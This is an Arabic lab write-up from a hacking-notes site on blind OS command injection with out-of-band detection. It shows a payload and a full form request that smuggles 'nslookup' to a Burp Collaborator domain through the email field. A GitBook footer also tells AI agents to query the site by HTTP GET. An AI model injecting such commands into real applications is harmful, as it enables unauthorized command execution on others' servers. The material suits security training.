> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/web/command-injection/blind-command-injection-with-oob-exfiltration.md).

# حقن أوامر أعمى مع استخراج OOB

### حقن أوامر نظام التشغيل الأعمى مع تفاعل خارج النطاق

يقدّم هذا المختبر ثغرة لحقن أوامر نظامية عمياء في وظيفة التغذية الراجعة. / ينفذ التطبيق أمر شِلّ مبنيًا من بيانات يزوّدها المستخدم. هذا التنفيذ هو **غير متزامن** ولا يؤثر في الاستجابة التي يعيدها التطبيق. لا يمكن إعادة توجيه مخرجات الأمر إلى موقع يمكن الوصول إليه. ومن ناحية أخرى، من الممكن التسبب في **تفاعلات خارج النطاق (OOB)** إلى نطاق خارجي.

الهدف من المختبر هو استخدام هذا الحقن لإجبار التطبيق على إجراء طلب \*\*DNS\*\* إلى نطاق Burp Collaborator.

#### **النهج**

`nslookup` يُستخدم لتوليد استعلام صادر. / يتم الحقن في أحد حقول النموذج، مع إحاطة الأمر بـ `;` لكسر البنية الأصلية.

مثال على الأمر المختبَر:

```
nslookup
```

الحِمولة المحقونة:

<pre><code><strong>;nslookup IP;
</strong></code></pre>

إذا نجح الحقن، فسنحصل على الطلب في Burp Collaborator.

#### **مثال على الطلب الكامل**

{% code overflow="wrap" %}

```bash
csrf=2GdzmbhNzU7HHOj8pOZUwUfJ1s0EIbjP&name=test&email=test%40test.com.com;nslookup v51x9gtodb5n35252oddaichm8szgq4f.oastify.com;&subject=test&message=test.com
```

{% endcode %}

تُطلق هذه الحمولة طلب DNS إلى النطاق المُتحكَّم به، مما يؤكد الحقن الأعمى خارج النطاق (OOB).

<figure><img src="/files/ee0c82fef7a9b0c3d2e40214b11775babeaec1f5" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/web/command-injection/blind-command-injection-with-oob-exfiltration.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
